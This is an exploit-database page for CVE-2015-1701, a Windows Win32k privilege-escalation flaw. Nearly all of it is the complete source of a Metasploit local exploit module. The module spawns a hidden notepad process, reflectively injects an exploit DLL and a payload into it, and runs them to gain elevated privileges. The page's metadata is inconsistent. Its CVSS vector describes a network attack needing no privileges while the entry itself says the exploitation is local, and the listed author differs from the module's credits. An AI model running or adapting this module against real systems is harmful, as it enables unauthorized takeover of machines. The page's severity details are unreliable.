Exploitalert - Database of Exploits

Microsoft Windows ClientCopyImage Improper Object Handling

CVE	Category	Price	Severity
CVE-2015-1701	CWE-416	$15,000	High

Author	Risk	Exploitation Type	Date
SandboxEscaper	High	Local	2015-06-24

CPE
cpe:cpe:/o:microsoft:windows

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	None	C	There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity	Low	I	Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability	None	A	There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.

http://cxsecurity.com/ascii/WLB-2015060143

Microsoft Windows ClientCopyImage Improper Object Handling## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows ClientCopyImage Win32k Exploit', 'Description' => %q{ This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # vulnerability discovery and exploit in the wild 'hfirefox', # Code released on github 'OJ Reeves' # msf module ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-1701'], ['MSB', 'MS15-051'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'], ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'], ['URL', 'https://technet.microsoft.com/library/security/MS15-051'] ], 'DisclosureDate' => 'May 12 2015', 'DefaultTarget' => 0 })) end def check # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work) # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works) # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works) # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works) if sysinfo['OS'] !~ /windows/i return Exploit::CheckCode::Unknown end if sysinfo['Architecture'] =~ /(wow|x)64/i arch = ARCH_X86_64 elsif sysinfo['Architecture'] =~ /x86/i arch = ARCH_X86 end file_path = expand_path('%windir%') << '\system32\win32k.sys' major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") return Exploit::CheckCode::Safe if build == 7601 return Exploit::CheckCode::Detected end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end if sysinfo['Architecture'] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") if target.arch.first == ARCH_X86 dll_file_name = 'cve-2015-1701.x86.dll' else dll_file_name = 'cve-2015-1701.x64.dll' end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name) library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end

Impressum